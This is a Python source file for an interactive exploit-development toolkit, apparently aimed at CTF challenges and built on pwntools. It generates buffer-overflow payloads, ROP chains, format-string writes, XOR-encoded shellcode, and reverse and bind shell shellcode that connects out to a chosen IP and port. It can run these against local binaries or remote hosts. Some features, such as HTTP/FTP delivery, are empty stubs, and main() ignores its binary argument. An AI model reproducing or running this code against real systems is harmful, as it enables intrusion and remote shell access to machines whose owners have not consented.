liveexploit.py

#!/usr/bin/env python3
from pwn import *
import sys
import random
import string
import time
import os
import logging
from cryptography.fernet import Fernet
import subprocess
import json
from prompt_toolkit import prompt
from prompt_toolkit.completion import WordCompleter
from prompt_toolkit.styles import Style
from prompt_toolkit.formatted_text import ANSI

# Configure logging
logging.basicConfig(level=logging.INFO, format="[%(levelname)s] %(message)s")

# Banner
def banner():
    print("""

 █   █ █ █ ██▀   ██▀ ▀▄▀ █▀▄ █   ▄▀▄ █ ▀█▀
 █▄▄ █ ▀▄▀ █▄▄   █▄▄ █ █ █▀  █▄▄ ▀▄▀ █  █


\033[1;35m▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
\033[1;33m█ \033[1;36m ➤ CTF Exploit Dev Toolkit \033[1;33m█
\033[1;31m█ \033[1;34m ➤ Author: livepwn,0vuln   \033[1;31m█
\033[1;32m█ \033[1;35m ➤ Exploit, Pwn, Repeat   \033[1;32m █
\033[1;35m▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀\033[0m    """)

# Define a custom style for the prompt
style = Style.from_dict({
    'prompt': 'bold ansired underline',  # Bold, red, and underlined
})

# Function to create a bold red prompt
def bold_red_prompt():
    return ANSI("\033[1;31mlivepwn> \033[0m")  # Bold, red, and underlined

# 1. Buffer Overflow Payload Generator
def generate_buffer_overflow(buffer_size, ret_address, shellcode=None):
    """Generate a buffer overflow payload."""
    payload = b"A" * buffer_size  # Padding
    payload += p64(ret_address)   # Overwrite return address
    if shellcode:
        payload += shellcode      # Append shellcode
    return payload

# 2. ROP Chain Generator
def generate_rop_chain(binary_path, gadgets):
    """Generate a ROP chain using specified gadgets."""
    try:
        binary = ELF(binary_path)
        rop = ROP(binary)
        for gadget in gadgets:
            rop.call(gadget)
        return rop.chain()
    except Exception as e:
        logging.error(f"Error generating ROP chain: {e}")
        sys.exit(1)

# 3. Format String Exploit
def format_string_exploit(offset, address, value=None):
    """Generate a format string exploit payload."""
    try:
        if value:
            payload = fmtstr_payload(offset, {address: value})
        else:
            payload = fmtstr_payload(offset, address)
        return payload
    except Exception as e:
        logging.error(f"Error generating format string: {e}")
        sys.exit(1)

# 4. Shellcode Generation
def generate_shellcode(shell_type, ip=None, port=None):
    """Generate shellcode for reverse/bind shell."""
    if shell_type == "reverse":
        if not ip or not port:
            logging.error("IP and port are required for reverse shell.")
            sys.exit(1)
        return asm(shellcraft.connect(ip, port) + shellcraft.dupsh())
    elif shell_type == "bind":
        if not port:
            logging.error("Port is required for bind shell.")
            sys.exit(1)
        return asm(shellcraft.bindsh(port))
    else:
        logging.error("Invalid shell type.")
        sys.exit(1)

# 5. Fuzzer
def fuzz(length=100):
    """Generate a random fuzzing payload."""
    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

# 6. Crash Detection
def detect_crash(binary, payload):
    """Detect crashes by running the binary with a payload."""
    try:
        p = process(binary)
        p.sendline(payload)
        p.wait()
        if p.exitcode != 0:
            logging.info("Crash detected!")
            return True
        else:
            logging.info("No crash detected.")
            return False
    except Exception as e:
        logging.error(f"Error during crash detection: {e}")
        sys.exit(1)

# 7. Memory Dumping
def dump_memory(binary, start_addr, end_addr):
    """Dump memory from a binary."""
    try:
        p = process(binary)
        p.sendline(f"dump {hex(start_addr)} {hex(end_addr)}")
        memory_dump = p.recvall()
        with open("memory_dump.bin", "wb") as f:
            f.write(memory_dump)
        logging.info("Memory dumped to memory_dump.bin")
    except Exception as e:
        logging.error(f"Error during memory dump: {e}")
        sys.exit(1)

# 8. Binary Analysis
def analyze_binary(binary_path):
    """Analyze a binary for symbols and protections."""
    try:
        binary = ELF(binary_path)
        logging.info(f"Binary: {binary_path}")
        logging.info(f"Architecture: {binary.arch}")
        logging.info(f"Address: {hex(binary.address)}")
        logging.info(f"Symbols: {binary.symbols}")
        logging.info(f"Protections: NX={binary.nx}, PIE={binary.pie}, Canary={binary.canary}")
    except Exception as e:
        logging.error(f"Error analyzing binary: {e}")
        sys.exit(1)

# 9. Exploit Execution
def execute_exploit(binary, payload, remote=False, ip=None, port=None):
    """Execute an exploit locally or remotely."""
    try:
        if remote:
            logging.info(f"Connecting to {ip}:{port}...")
            p = remote(ip, port)
        else:
            p = process(binary)
        p.sendline(payload)
        p.interactive()
    except Exception as e:
        logging.error(f"Error executing exploit: {e}")
        sys.exit(1)

# 10. Helper Functions
def encode_shellcode(shellcode, key):
    """Encode shellcode using XOR."""
    return xor(shellcode, key)

def generate_key():
    """Generate a random encryption key."""
    return Fernet.generate_key()

# 11. Heap Exploitation
def heap_exploit(binary, size, count):
    """Simulate a heap exploitation scenario."""
    try:
        p = process(binary)
        for _ in range(count):
            p.sendline(f"malloc {size}")
        p.interactive()
    except Exception as e:
        logging.error(f"Error during heap exploitation: {e}")
        sys.exit(1)

# 12. Kernel Exploitation
def kernel_exploit(module_path):
    """Simulate a kernel exploitation scenario."""
    try:
        subprocess.run(["insmod", module_path], check=True)
        logging.info("Kernel module loaded.")
    except Exception as e:
        logging.error(f"Error during kernel exploitation: {e}")
        sys.exit(1)

# 13. Payload Delivery
def deliver_payload(payload, protocol, ip, port):
    """Deliver payload via specified protocol."""
    try:
        if protocol == "http":
            logging.info(f"Delivering payload via HTTP to {ip}:{port}...")
            # Implement HTTP delivery
        elif protocol == "ftp":
            logging.info(f"Delivering payload via FTP to {ip}:{port}...")
            # Implement FTP delivery
        else:
            logging.error("Unsupported protocol.")
    except Exception as e:
        logging.error(f"Error delivering payload: {e}")
        sys.exit(1)

# 14. Reporting
def generate_report(exploit_details):
    """Generate an exploit report."""
    try:
        with open("exploit_report.json", "w") as f:
            json.dump(exploit_details, f, indent=4)
        logging.info("Exploit report generated: exploit_report.json")
    except Exception as e:
        logging.error(f"Error generating report: {e}")
        sys.exit(1)

# 15. Interactive CLI
def interactive_cli():
    """Interactive command-line interface for the tool."""
    actions = WordCompleter([
        "buffer_overflow", "rop_chain", "format_string", "shellcode",
        "fuzzing", "crash_detection", "dump_memory", "binary_analysis",
        "execute_exploit", "heap_exploit", "kernel_exploit", "deliver_payload",
        "generate_report", "exit"
    ], ignore_case=True)

    while True:
        try:
            # Use the custom bold red prompt
            action = prompt(bold_red_prompt(), completer=actions, style=style)
            if action == "exit":
                break
            elif action == "buffer_overflow":
                buffer_size = int(prompt("Buffer size: "))
                ret_address = int(prompt("Return address (in hex): "), 16)
                shellcode_choice = prompt("Add shellcode? (y/n): ").lower()
                shellcode = generate_shellcode("reverse", "127.0.0.1", 4444) if shellcode_choice == "y" else None
                payload = generate_buffer_overflow(buffer_size, ret_address, shellcode)
                execute_exploit("./vulnerable", payload)
            elif action == "rop_chain":
                gadgets = prompt("Enter gadgets (comma-separated): ").split(",")
                rop_chain = generate_rop_chain("./vulnerable", gadgets)
                execute_exploit("./vulnerable", rop_chain)
            elif action == "format_string":
                offset = int(prompt("Format string offset: "))
                address = int(prompt("Target address (in hex): "), 16)
                value = int(prompt("Value to write (optional, in hex): "), 16) if prompt("Write value? (y/n): ").lower() == "y" else None
                payload = format_string_exploit(offset, address, value)
                execute_exploit("./vulnerable", payload)
            elif action == "shellcode":
                shell_type = prompt("Shell type (reverse/bind): ").lower()
                ip = prompt("IP for reverse shell: ") if shell_type == "reverse" else None
                port = int(prompt("Port: "))
                shellcode = generate_shellcode(shell_type, ip, port)
                execute_exploit("./vulnerable", shellcode)
            elif action == "fuzzing":
                length = int(prompt("Fuzz length: "))
                payload = fuzz(length)
                execute_exploit("./vulnerable", payload)
            elif action == "crash_detection":
                length = int(prompt("Fuzz length: "))
                payload = fuzz(length)
                detect_crash("./vulnerable", payload)
            elif action == "dump_memory":
                start_addr = int(prompt("Start address (in hex): "), 16)
                end_addr = int(prompt("End address (in hex): "), 16)
                dump_memory("./vulnerable", start_addr, end_addr)
            elif action == "binary_analysis":
                analyze_binary("./vulnerable")
            elif action == "execute_exploit":
                remote_choice = prompt("Remote exploit? (y/n): ").lower()
                if remote_choice == "y":
                    ip = prompt("IP: ")
                    port = int(prompt("Port: "))
                    execute_exploit("./vulnerable", "", remote=True, ip=ip, port=port)
                else:
                    payload = fuzz(100)
                    execute_exploit("./vulnerable", payload)
            elif action == "heap_exploit":
                size = int(prompt("Allocation size: "))
                count = int(prompt("Number of allocations: "))
                heap_exploit("./vulnerable", size, count)
            elif action == "kernel_exploit":
                module_path = prompt("Kernel module path: ")
                kernel_exploit(module_path)
            elif action == "deliver_payload":
                protocol = prompt("Delivery protocol (http/ftp): ").lower()
                ip = prompt("Target IP: ")
                port = int(prompt("Target port: "))
                payload = fuzz(100)
                deliver_payload(payload, protocol, ip, port)
            elif action == "generate_report":
                exploit_details = {
                    "target": "./vulnerable",
                    "payload": "example_payload",
                    "technique": "buffer_overflow",
                    "result": "success"
                }
                generate_report(exploit_details)
            else:
                logging.error("Invalid action!")
        except KeyboardInterrupt:
            break
        except Exception as e:
            logging.error(f"Error: {e}")

# Main Interface
def main():
    banner()
    if len(sys.argv) < 2:
        logging.error("""Usage: python3 liveexploit.py <binary>

➜ Example: python3 liveexploit.py ./vulnerable""")
        sys.exit(1)

    binary = sys.argv[1]
    interactive_cli()

if __name__ == "__main__":
    main()